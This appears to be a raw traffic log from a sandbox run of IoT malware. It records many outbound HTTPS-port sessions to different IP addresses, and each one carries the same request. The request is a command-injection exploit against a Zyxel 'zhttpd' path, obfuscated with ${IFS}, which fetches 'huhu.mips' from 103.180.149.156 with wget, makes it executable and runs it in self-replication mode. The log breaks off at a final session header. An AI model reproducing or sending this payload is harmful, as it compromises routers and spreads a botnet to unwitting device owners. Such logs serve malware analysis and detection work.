                                                      Feb 2, 2024 06:35:56.707412004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5343192.168.2.1441984204.208.133.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707461119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5344192.168.2.1446552185.151.158.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707482100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5345192.168.2.1452896188.101.105.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707525969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5346192.168.2.144441092.110.197.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707572937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5347192.168.2.145484479.175.230.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707607985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5348192.168.2.1460702212.195.64.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707659960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5349192.168.2.143845077.18.190.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707706928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5350192.168.2.1440732222.237.254.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707746983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5351192.168.2.14507981.230.205.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707778931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5352192.168.2.14524202.19.82.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707811117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5353192.168.2.1442706132.53.182.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707861900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5354192.168.2.1449094130.71.131.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707905054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5355192.168.2.145274274.68.217.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.707971096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5356192.168.2.1456404119.185.202.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708000898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5357192.168.2.144007851.138.16.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708051920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5358192.168.2.143684847.25.20.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708086967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5359192.168.2.143812648.61.40.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708136082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5360192.168.2.143654053.12.164.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708183050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5361192.168.2.144768094.22.221.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708208084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5362192.168.2.1440548188.160.60.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708252907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5363192.168.2.145980470.212.202.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708282948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5364192.168.2.1455450196.9.92.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708338976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5365192.168.2.145305673.239.227.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708380938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5366192.168.2.144171091.159.165.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708417892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5367192.168.2.1442230124.171.174.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708472013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5368192.168.2.145631063.105.158.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708529949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5369192.168.2.1438110155.234.107.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708560944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5370192.168.2.1432778171.58.235.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708619118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5371192.168.2.1449720104.121.80.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708664894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5372192.168.2.1439808141.177.23.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708712101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5373192.168.2.145905889.212.81.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708759069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5374192.168.2.1458696156.45.93.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708795071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5375192.168.2.1452544124.105.68.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708811045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5376192.168.2.1437332108.247.191.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708864927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5377192.168.2.144317862.21.155.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708904982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5378192.168.2.1459004216.58.110.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708945990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5379192.168.2.1438154154.209.91.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.708987951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5380192.168.2.145606438.243.15.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709028959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5381192.168.2.145806698.253.220.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709079981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5382192.168.2.1453506105.161.68.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709108114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5383192.168.2.1434926201.157.220.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709167004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5384192.168.2.145089089.167.219.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709224939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5385192.168.2.1460814128.136.248.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709242105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5386192.168.2.1446288156.170.192.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709284067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5387192.168.2.1446116196.124.194.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709342003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5388192.168.2.1447780181.60.108.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709362984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5389192.168.2.143973668.57.228.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709418058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5390192.168.2.1454376122.253.69.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709471941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5391192.168.2.1435364189.222.175.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709510088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5392192.168.2.145044897.157.67.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709515095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5393192.168.2.1440350108.3.225.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709564924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5394192.168.2.1434156116.233.51.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709628105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5395192.168.2.144523497.89.7.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709688902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5396192.168.2.1433298147.194.2.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709721088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5397192.168.2.1436918117.207.62.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709758997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5398192.168.2.145667461.177.154.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709813118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5399192.168.2.145284498.193.111.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709846973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5400192.168.2.143637279.127.33.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709896088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5401192.168.2.145125075.247.230.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709924936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5402192.168.2.1454886192.76.38.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.709961891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5403192.168.2.143764861.58.179.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710009098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5404192.168.2.1456692140.128.254.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710050106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5405192.168.2.144213657.159.27.225443
                                                      TimestampBytes transferredDirectionData
